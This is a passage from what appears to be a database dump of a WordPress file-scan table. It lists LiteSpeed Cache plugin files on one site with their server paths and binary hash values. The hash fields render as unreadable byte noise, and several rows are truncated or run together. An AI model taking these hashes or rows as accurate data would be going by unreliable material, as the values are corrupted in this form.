','wp-content/plugins/litespeed-cache/assets/img/lscwp_grayscale_font-icon_22px.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/lscwp_grayscale_font-icon_22px.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','54\"\\ƒ?e','kuԷ1l%%X,YM','',0,'?'),('<*m!۾uI7','wp-content/plugins/litespeed-cache/assets/img/quic-cloud-icon-16x16.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/quic-cloud-icon-16x16.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.2IaD.\0','NEe}ŵfWҫoˆy','',0,'?'),('2A~HN\"\\mXy6','wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo-light_stack_300px.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo-light_stack_300px.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9k\rCQ+','Kұ.w_oe?]HA T~`<','',0,'?'),('AHi','wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo.svg','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/quic-cloud-logo.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K50\'','_*A^I(﫰6pZ2','',0,'?'),('tbeJ?:','wp-content/plugins/litespeed-cache/assets/img/slack-logo.png','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/img/slack-logo.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-{sch&f','a\0NJ>/\0+O5%)J:Po','',0,'?'),('%dnӍ%eϧ/&','wp-content/plugins/litespeed-cache/assets/js/babel.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/babel.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','؁s/b|V͹','jS􂠒1ϗd$q\npZZxt','',0,'?'),('Vؤ/ f','wp-content/plugins/litespeed-cache/assets/js/guest.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/guest.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','yۤ~MO )+C','|o0xt3o:lH Hq9x0*','',0,'?'),('$y?E2RGl5','wp-content/plugins/litespeed-cache/assets/js/guest.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/guest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n\"Z}A7','UX]>DB@[ x3¯6\'4\Z','',0,'?'),(']\\;T{ie8','wp-content/plugins/litespeed-cache/assets/js/instant_click.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/instant_click.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':ʥadEhVY4@zr','E*BM_r#vjt%93qٌ\"','',0,'?'),('7]\rШ+\'\Z','wp-content/plugins/litespeed-cache/assets/js/instant_click.ori.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/instant_click.ori.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f0^/_nL','fwmlґ;-','',0,'?'),(':xz0D3','wp-content/plugins/litespeed-cache/assets/js/iziModal.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/iziModal.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','VkNḨ$','V`rU3;\"M tz0','',0,'?'),('\"_߼H8frp[','wp-content/plugins/litespeed-cache/assets/js/js_delay.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/js_delay.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A[݈!Pb','QߠZ(1BՆ7wfߓF|T','',0,'?'),(' W\nmJ','wp-content/plugins/litespeed-cache/assets/js/js_delay.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/js_delay.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`F{K%r','h3$[ܗ4㝩\rMB٬.}','',0,'?'),('ՉjIW0/\"E','wp-content/plugins/litespeed-cache/assets/js/lazyload.init.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/lazyload.init.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7ij%nP','|jC&pdE\r0to֍U','',0,'?'),('cxs7Gc','wp-content/plugins/litespeed-cache/assets/js/lazyload.lib.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/lazyload.lib.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^O,~x5=','Rqorzg-\'/[3','',0,'?'),('3MdV|n~T','wp-content/plugins/litespeed-cache/assets/js/lazyload.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/lazyload.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x2Uk','2HD{0u=f\Z1`','',0,'?'),('A&ͬ1B9:b','wp-content/plugins/litespeed-cache/assets/js/litespeed-cache-admin.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/litespeed-cache-admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2_>S98Kl','T2JOR\0#=Xn\\xuj','',0,'?'),('Srf$8#If','wp-content/plugins/litespeed-cache/assets/js/react.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/react.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zZht\"o ','UAUP.\\ jXhbB]\ro','',0,'?'),('*a^(\"`7','wp-content/plugins/litespeed-cache/assets/js/webfontloader.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/webfontloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~(T* }C','9x#B!E\n\Z|j!?','',0,'?'),('ŃY&]','wp-content/plugins/litespeed-cache/assets/js/webfontloader.min.js','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/assets/js/webfontloader.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E?x ۔k^JZ','<9 @b|ECl3_#K#NuSF8','',0,'?'),('C߬Fhܚ','wp-content/plugins/litespeed-cache/autoload.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9Mώ10ؽ','r t]U V06ROj$1~','',0,'?'),('qYEW[ 9K','wp-content/plugins/litespeed-cache/cli/debug.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/cli/debug.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0Nxo$B|','1rER =dBn}Ϸ-Zu]4Oc','',0,'?'),('SJe,','wp-content/plugins/litespeed-cache/cli/image.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/cli/image.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ُnau]2','rFM|\'}rJCq^i`','',0,'?'),('E$2?ez','wp-content/plugins/litespeed-cache/cli/online.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/cli/online.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z7#:>߹iK','SFy_2^/>/%ڢDc','',0,'?'),('퀾J!&$)`e','wp-content/plugins/litespeed-cache/cli/option.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/cli/option.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\hB?)\\','V;Lߺ@!I)(S@ٻ>&Q','',0,'?'),('^Uű@t','wp-content/plugins/litespeed-cache/cli/presets.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/cli/presets.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','(\\V\\','ESӾx\'@0/)B1s ','',0,'?'),('grs#','wp-content/plugins/litespeed-cache/cli/purge.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/cli/purge.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','87\Zv','kNMCͽ$ݾ sFУI>Z-@','',0,'?'),('aNJΉ `ǿ] OI','wp-content/plugins/litespeed-cache/data/.htaccess','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y˝ENB,ȧ3','U`hUjϐĄld:7W','',0,'?'),('oeH^>ܹ+־','wp-content/plugins/litespeed-cache/data/const.default.ini','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/const.default.ini',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' jXyP','OQ2}\09\'^BdG]\0Oh','',0,'?'),('','wp-content/plugins/litespeed-cache/data/esi.nonces.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/esi.nonces.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$\r5J}Y\0>A','\'ew;k0DկO\\4wCX','',0,'?'),('p5pJ0T<;ɿ<','wp-content/plugins/litespeed-cache/data/js_defer_excludes.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/js_defer_excludes.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M|QCEFa','\\$@((pw̺t΋I!Cu','',0,'?'),('x.GHoKk','wp-content/plugins/litespeed-cache/data/js_excludes.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/js_excludes.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2|%e[\rV&','s)L.x.\n0)~rcL','',0,'?'),('oy*E`?','wp-content/plugins/litespeed-cache/data/optm_uri_exc.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/optm_uri_exc.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','HԾE%\nRviSj','\r#«}RC\"Cjꥉ','',0,'?'),('*&B7','wp-content/plugins/litespeed-cache/data/preset/advanced.data','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/preset/advanced.data',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tW,\n;C|v{U','N1_#Mlc;N\rN{qm','',0,'?'),('棿:pS{_7','wp-content/plugins/litespeed-cache/data/preset/aggressive.data','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/preset/aggressive.data',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߜG\nuu','NHrjLC;1-3-','',0,'?'),('jÞcPll3','wp-content/plugins/litespeed-cache/data/preset/basic.data','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/preset/basic.data',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+\0%bÄ!','BVcgCLsSAVvmV','',0,'?'),('QRT\0','wp-content/plugins/litespeed-cache/data/preset/essentials.data','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/preset/essentials.data',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nNMVo#f E','uP`+$f4v䇸d4C3^wK','',0,'?'),('ME:WQSOHf','wp-content/plugins/litespeed-cache/data/preset/extreme.data','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/preset/extreme.data',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&Zz; \rs\0','OO8BpQld\" \r8C','',0,'?'),(' nYZG+h','wp-content/plugins/litespeed-cache/data/ucss_whitelist.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/data/ucss_whitelist.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6\\9i','^(*_3^<q_C\rYZ','',0,'?'),(':RjUg','wp-content/plugins/litespeed-cache/guest.vary.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/guest.vary.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gд$l1/','ʬGu%c a\n^ϯk0~','',0,'?'),('ҍVOh\nS','wp-content/plugins/litespeed-cache/inc/object.lib.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/inc/object.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fݭ+ @h\ZV','o8fi?ٔX{h}~CBPz\'','',0,'?'),('ೈp΄DN','wp-content/plugins/litespeed-cache/lang/litespeed-cache.pot','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lang/litespeed-cache.pot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',42EDI\" ','ߧT^Kч#Te8QEaV^','',0,'?'),(';/˨M֛','wp-content/plugins/litespeed-cache/lib/css-min/colors.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lib/css-min/colors.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uREMȢ1U','ѻeT>nA c(@~.=&5','',0,'?'),('/Dێ$x','wp-content/plugins/litespeed-cache/lib/css-min/minifier.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lib/css-min/minifier.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ͮύ{``>}w]','|?`os_!L9zM9=B4,z','',0,'?'),('Sŧ{k.1bh_1oy0','Uf2L.rf9B W','',0,'?'),('J}_lRF+z+','wp-content/plugins/litespeed-cache/lib/jsmin_data/operators.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lib/jsmin_data/operators.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gLF5¾','#䯣x\'Yv\rӦp*͒o','',0,'?'),('yݪ8-20','wp-content/plugins/litespeed-cache/lib/jsmin_data/operators_after.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lib/jsmin_data/operators_after.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';:8~EDe','\Z\ZaGk`}TCn?ؚS','',0,'?'),('yʟUQy-','wp-content/plugins/litespeed-cache/lib/jsmin_data/operators_before.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lib/jsmin_data/operators_before.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J`d@t*V{',';[uaM\"qӝC5 \rO#7H+','',0,'?'),('XJ)U\\u#','wp-content/plugins/litespeed-cache/lib/object-cache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lib/object-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c58!aMk=','bǣ>.c͇\n5#\n\"G','',0,'?'),('7:ҙ,+JKqUX ','wp-content/plugins/litespeed-cache/lib/php-compatibility.func.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/lib/php-compatibility.func.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u?``=D_',' +gbm%೶].xm','',0,'?'),('3I\0)~ke<','wp-content/plugins/litespeed-cache/litespeed-cache.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/litespeed-cache.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.> ,9','nGz=VyUt߸[.ҹE','',0,'?'),('[\\E g_-\"','wp-content/plugins/litespeed-cache/qc-ping.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/qc-ping.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y!9D\rQ','\'1]|H᩹yJy\rMi_?','',0,'?'),('&ŽkuP\0','wp-content/plugins/litespeed-cache/readme.txt','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a.X@tQ','E8S\0uP7s%?','',0,'?'),('ɽoPatD','wp-content/plugins/litespeed-cache/src/activation.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/activation.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#l_Sf[6','Ny ªa6LY$:c\\\r','',0,'?'),('@\r4[)L\0S?_','wp-content/plugins/litespeed-cache/src/admin-display.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/admin-display.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`<\r7[\0','2\'זN-||dU\Z&p','',0,'?'),('^{\07d\Zn','wp-content/plugins/litespeed-cache/src/admin-settings.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/admin-settings.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']Vhڀ\"','S\"p\n`=','',0,'?'),('7:Ѷуb;','wp-content/plugins/litespeed-cache/src/api.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/api.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+D3>źUU','G8ם!ohqڗn1','',0,'?'),('{\'\'O,','wp-content/plugins/litespeed-cache/src/avatar.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/avatar.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','lgNJ:C','6 8iHIRKo6Lڅ','',0,'?'),('/ ż@2꾓nqW','wp-content/plugins/litespeed-cache/src/base.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/base.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Š9҃z:Q','xwt`ڂhq_T6M< pU{9','',0,'?'),(' x_Ď7+','wp-content/plugins/litespeed-cache/src/cdn/cloudflare.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/cdn/cloudflare.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b}@ B@LV~B','!_?z\"g.HW,,>]','',0,'?'),('S}ƾbBa','wp-content/plugins/litespeed-cache/src/cdn/quic.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/cdn/quic.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1Ay\0ƿ=N_','+\"VYa񞘝Sr:ImD*I,H','',0,'?'),('/4S\r ZE','wp-content/plugins/litespeed-cache/src/cdn-setup.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/cdn-setup.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͠&H~X4 ','@e其CRվrWg5w0\r','',0,'?'),('oK^ݕTrs7 ','wp-content/plugins/litespeed-cache/src/cdn.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/cdn.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','? \\[AdO1s','\'\'5kbeT\nBv?Σ1eh\ZBb','',0,'?'),('y(kn:\Z','wp-content/plugins/litespeed-cache/src/cloud.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/cloud.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<`Y}s5p','',0,'?'),('`4_Sw?','wp-content/plugins/litespeed-cache/src/core.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/core.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dTo+Q\" ','i\ZDump~6,Bd`i R','',0,'?'),('\"#)qC{','wp-content/plugins/litespeed-cache/src/crawler-map.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/crawler-map.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aJ ?\Z |b֭3','\"á+hF\"|艹W;pOz1SZ','',0,'?'),('H1#pBX<؝p','wp-content/plugins/litespeed-cache/src/crawler.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/crawler.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l餷\0[gߨ;','nvveHo}ت!`YV}|','',0,'?'),('R]ބqD\"z}','wp-content/plugins/litespeed-cache/src/data.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/data.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_jq#2.ШΦ','/قR5kz4ǎR','',0,'?'),('$v\"Q}o','wp-content/plugins/litespeed-cache/src/data.upgrade.func.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/data.upgrade.func.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hx`ӎOz','_ !$P¥d]DFjY|i폄','',0,'?'),('V)RR~µzҀ','wp-content/plugins/litespeed-cache/src/data_structure/avatar.sql','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/data_structure/avatar.sql',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|c c','c4!_ ?C-^!x','',0,'?'),('$ ir}~\"','wp-content/plugins/litespeed-cache/src/data_structure/crawler.sql','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/data_structure/crawler.sql',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߴ8\n+vBm1','rf2@RՐdW):','',0,'?'),('mKIEo','4ս,˛-kU3d|hҏ','',0,'?'),('T1\"FǸ|','wp-content/plugins/litespeed-cache/src/data_structure/img_optming.sql','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/data_structure/img_optming.sql',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',Xahr','a41>KD?IPݞ^|-','',0,'?'),('%2j','wp-content/plugins/litespeed-cache/src/data_structure/url.sql','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/data_structure/url.sql',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#=5u-&','V@OU#ϷS_/D(','',0,'?'),(')T (`k','wp-content/plugins/litespeed-cache/src/data_structure/url_file.sql','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/data_structure/url_file.sql',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P T9g1','np Y;k7ƸZۜt_','',0,'?'),('چ?p{Ni}\r','wp-content/plugins/litespeed-cache/src/db-optm.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/db-optm.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','fk$k<G(','HNהKiY!$t\Z7P\r\Zcw','',0,'?'),('sJ','wp-content/plugins/litespeed-cache/src/debug2.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/debug2.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ly!\Zm','w꣎8I.SBO4ԧR','',0,'?'),(',o=VC','wp-content/plugins/litespeed-cache/src/doc.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/doc.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7BP7~K (Q6','@y MoZb{ L R== ','',0,'?'),('c WX\rmo','wp-content/plugins/litespeed-cache/src/error.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/error.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j]Z&-s៧Js','cL8d4@;*YBQg~10','',0,'?'),('[%Ol >L\'2','wp-content/plugins/litespeed-cache/src/esi.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/esi.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','XKhbx','\'_L\Zpc#ߔ{v','',0,'?'),(']','wp-content/plugins/litespeed-cache/src/file.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/file.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0w`VN\'',':2:mhsSAh}L|','',0,'?'),('iHX\nMNI','wp-content/plugins/litespeed-cache/src/gui.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/gui.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q|7ogor','W[:$юH-3\\,T.ȩ','',0,'?'),('QPF=_','wp-content/plugins/litespeed-cache/src/health.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/health.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']aoG+e9f','C|s^Tțj3ORm<(VN;N<','',0,'?'),('\"YW(LD','wp-content/plugins/litespeed-cache/src/htaccess.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/htaccess.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','a%x[ Ǥ','$D`«=n7vP gD* 0','',0,'?'),('*0}O| R-a|','wp-content/plugins/litespeed-cache/src/img-optm.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/img-optm.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9i)pΑTcPp}','3*MymA(J#CZY6N','',0,'?'),('PKؠ{LvO','wp-content/plugins/litespeed-cache/src/import.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/import.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','{ra޿@ >',';MHB q®(=808\"I̧^#','',0,'?'),('~d%mp6#AE','wp-content/plugins/litespeed-cache/src/instance.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/instance.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r`:FK&GK','ʴ̝\0Qr5\'R4qnVvY','',0,'?'),('DUnGl( ','wp-content/plugins/litespeed-cache/src/lang.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/lang.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','IfN$ym+e',']2po!5`gL~j?*','',0,'?'),('oq{k?^A','wp-content/plugins/litespeed-cache/src/localization.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/localization.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ñsr=KB','vPDw4 Qݤz1pHN','',0,'?'),('EW \0=oC','wp-content/plugins/litespeed-cache/src/media.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/media.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ivQ5:h c\\J','SvT.0W}M_bYZk9c ','',0,'?'),('ޟ;M','wp-content/plugins/litespeed-cache/src/metabox.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/metabox.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','?8-4ּ9','/[y(9sK)r@w0v3k&','',0,'?'),('ey$','wp-content/plugins/litespeed-cache/src/object-cache.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/object-cache.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ŬCԌ5|h','3x,hGmG(9,\\\'!','',0,'?'),('cz Kῡd','wp-content/plugins/litespeed-cache/src/object.lib.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/object.lib.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZZKW?d_b9ؽu','O= >;-tijDTC','',0,'?'),('\0[_R/','wp-content/plugins/litespeed-cache/src/optimize.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/optimize.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~r q4t','ȉZWhׁsJ_W','wp-content/plugins/litespeed-cache/src/preset.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/preset.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W<^}E?&n','yǸ |*au+wȲPG!1','',0,'?'),('\0\\mFǿer\"','wp-content/plugins/litespeed-cache/src/purge.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/purge.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b4c 1y9O','v~K\\^؇_r','',0,'?'),('Ǯf(cF:','wp-content/plugins/litespeed-cache/src/report.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/report.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$`eg\'8',';ZP3L}h$ɶ\rC*c\" d}','',0,'?'),('F.!{XyL','wp-content/plugins/litespeed-cache/src/rest.cls.php','/home/tummmyov/tummyrevolution.com/wp-content/plugins/litespeed-cache/src/rest.cls.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4\\g3','{1 wY-7V3u\" 